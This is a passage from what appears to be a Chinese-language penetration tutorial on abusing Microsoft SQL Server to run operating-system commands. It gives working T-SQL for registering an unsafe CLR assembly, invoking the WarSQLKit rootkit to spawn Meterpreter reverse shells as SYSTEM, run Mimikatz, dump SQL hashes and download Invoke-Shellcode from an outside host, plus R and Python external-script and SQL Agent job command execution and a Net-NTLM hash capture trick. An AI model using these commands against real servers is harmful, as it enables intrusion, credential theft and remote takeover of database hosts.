000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
    WITH PERMISSION_SET = UNSAFE;
GO

创建存储过程

1
2
3
4
CREATE PROCEDURE [dbo].[ExecCommand]
@cmd NVARCHAR (MAX)
AS EXTERNAL NAME [Database1].[StoredProcedures].[ExecCommand]
go

利用CLR执行命令

1
exec dbo.ExecCommand "whoami /all";

WarSQLKit

WarSQLKit是一个针对MSSQL CLR进行利用的工具,有以下两个版本。

  • WarSQLKit是完全版本,内置多种功能。
  • WarSQLKitMinimal是迷你版,只能执行命令。
1
https://github.com/EPICROUTERSS/MSSQL-Fileless-Rootkit-WarSQLKit

导入WarSQLKit DLL文件

利用16进制文件流方式导入WarSQLKit.dll文件。

1
2
3
4
5
CREATE ASSEMBLY [WarSQLKit]
    AUTHORIZATION [dbo]
    FROM 0x4D5A......
    WITH PERMISSION_SET = UNSAFE;
GO

创建存储过程

1
2
3
4
5
6
CREATE PROCEDURE sp_cmdExec
@Command [nvarchar](max)
WITH EXECUTE AS CALLER
AS
EXTERNAL NAME WarSQLKit.StoredProcedures.CmdExec
GO

WarSQLKit 执行命令

WarSQLKit CmdExec实现了以下功能

执行任意Windows命令

1
EXEC sp_cmdExec 'whoami';

以SYSTEM权限执行Windows命令

1
EXEC sp_cmdExec 'whoami /RunSystemPriv';

以SYSTEM权限运行PowerShell命令

1
EXEC sp_cmdExec 'powershell Get-ChildItem /RunSystemPS';

以SYSTEM权限运行的X86 Meterpreter反向连接shell

1
EXEC sp_cmdExec 'sp_meterpreter_reverse_tcp LHOST LPORT GetSystem';

生成以SYSTEM权限运行的X64 Meterpreter反向连接shell

1
EXEC sp_cmdExec 'sp_x64_meterpreter_reverse_tcp LHOST LPORT GetSystem';

生成以SYSTEM权限运行的X64 Meterpreter RC4反向连接shell

1
2
EXEC sp_cmdExec 'sp_meterpreter_reverse_rc4 LHOST LPORT GetSystem'
RC4PASSWORD=123456

生成以SYSTEM权限运行的X86 Meterpreter_bind_tcp shell

1
EXEC sp_cmdExec 'sp_meterpreter_bind_tcp LPORT GetSystem';

每次使用 Meterpreter反弹都会创建一个reverse进程

运行Mimikatz功能抓取密码

1
2
exec sp_cmdExec 'sp_Mimikatz';
select * from WarSQLKitTemp //获取Mimikatz日志

文件下载

1
2
EXEC sp_cmdExec 'sp_downloadFile http://test.com/Invoke--Shellcode.ps1 C:\test\Invoke--Shellcode.ps1 300';
EXEC sp_cmdExec 'sp_downloadFile http://10.251.0.33/Invoke--Shellcode.ps1 C:\test\Invoke--Shellcode.ps1 300';

获取MSSQL Hash

1
EXEC sp_cmdExec 'sp_getSqlHash';

获取Windows Product

1
EXEC sp_cmdExec 'sp_getProduct';

获取可用的数据库

1
EXEC sp_cmdExec 'sp_getDatabases';

SQL Server R和Python的利用

MSSQL 2017加入了Microsoft机器学习服务,该服务允许通过MSSQL中sp_execute_external_script执行Python和R脚本

利用条件:

  • Machine Learning Services必须要在Python安装过程中选择

  • 必须启用外部脚本

    1
    2
    EXEC sp_configure 'external scripts enabled', 1
    RECONFIGURE WITH OVERRIDE
    • 重新启动数据库服务器

  • 用户拥有执行任何外部脚本权限

R脚本利用

利用R执行命令:

1
2
3
4
5
6
7
8
sp_configure 'external scripts enabled'
GO
EXEC sp_execute_external_script
@language=N'R',
@script=N'OutputDataSet <- data.frame(system("cmd.exe
/c dir",intern=T))'
WITH RESULT SETS (([cmd_out] text));
GO

利用R抓取Net-NTLM哈希:

1
@script=N'.libPaths("\\\\testhost\\foo\\bar");library("0mgh4x")'

Python脚本利用

Python :

1
2
3
4
5
exec sp_execute_external_script 
@language =N'Python',
@script=N'import sys
OutputDataSet = pandas.DataFrame([sys.version])'
WITH RESULT SETS ((python_version nvarchar(max)))

执行命令:

1
2
3
4
5
6
exec sp_execute_external_script 
@language =N'Python',
@script=N'import subprocess
p = subprocess.Popen("cmd.exe /c whoami", stdout=subprocess.PIPE)
OutputDataSet = pandas.DataFrame([str(p.stdout.read(), "utf-8")])'
WITH RESULT SETS (([cmd_out] nvarchar(max)))

SQL Server代理执行计划任务

启动SQL Server代理服务

SQL Server代理是一项Microsoft Windows服务,它执行计划的管理任务。

首先启动SQL Server代理服务。

创建计划任务

1
2
3
4
USE msdb; 
EXEC dbo.sp_add_job @job_name = N'test_powershell_job1'; 
EXEC sp_add_jobstep @job_name = N'test_powershell_job1', @step_name = N'test_powershell_name1', @subsystem = N'PowerShell', @command = N'c:\windows\system32\cmd.exe /c whoami /all >c:\\123.txt', @retry_attempts = 1, @retry_interval = 5 ;EXEC dbo.sp_add_jobserver @job_name = N'test_powershell_job1'; 
EXEC dbo.sp_start_job N'test_powershell_job1';

参考资料